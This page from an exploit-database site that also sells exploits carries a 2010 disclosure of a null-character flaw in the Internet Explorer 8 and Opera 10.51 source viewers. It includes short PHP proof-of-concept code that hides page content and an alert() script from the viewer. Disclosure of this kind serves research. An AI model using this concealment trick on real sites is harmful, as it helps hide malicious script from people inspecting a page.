0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IE/Opera source code viewer Null Character Handling
=================================================== IE/Opera source code viewer Null Character Handling =================================================== # Exploit Title: IE/Opera source code viewer Null Character Handling Vulnerability # Date: 10/04/2010 # Author: Daniel Correa # Software Link: http://www.microsoft.com/windows/internet-explorer/default.aspx # Software Link: http://www.opera.com/download/ # Version: Tested on IE 8, Opera 10.51 # Tested on: Windows XP; Windows 7 + default IE 8 # CVE : # Description : The vulnerability in the source code viewer in both browsers (IE & Opera) is when they are processing the null control character (0?00), including this character in the transmission message results in a misunderstanding that is reflected in the concealment of the transmitted message, only the code that is between valid tags is shown. In other words, exploiting this vulnerability we can completely hide the source code to the user of Internet Explorer and Opera browsers. # Code: The next code hide all the source code to source code viewer. <?php echo "\x00"; ?> Esto es un mensaje oculto This is a hide message Este es otro Thie is another one ... Como vemos podemos esconder cualquier mensaje As we can see we can hide any message <html> <head> <title>Titulo</title> </head> <body> <h1>Hola mundo</h1> </body> </html> And the next,only hide part of the code (The script part) <html> <head> <title>Titulo</title> </head> <body> <h1>Hello world</h1> </body> </html> <?php echo chr(0); ?> <script>alert('This code is never seen');</script> Package contain three proofs of concept: http://www.sinfocol.org/archivos/2010/04/ie_opera_null.zip -- Sinfocol http://www.sinfocol.org La informaci?n contenida en este mensaje es confidencial y puede ser legalmente privilegiada. Est? destinado ?nicamente para el destinatario. El acceso a este correo electr?nico por cualquier otra persona no est? autorizado. Si usted no es el destinatario, cualquier revelaci?n, copia, distribuci?n o cualquier acci?n u omitido que se adopten en la confianza en ?l, est? prohibida y puede ser ilegal. The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. # 0day.today [2024-07-07] #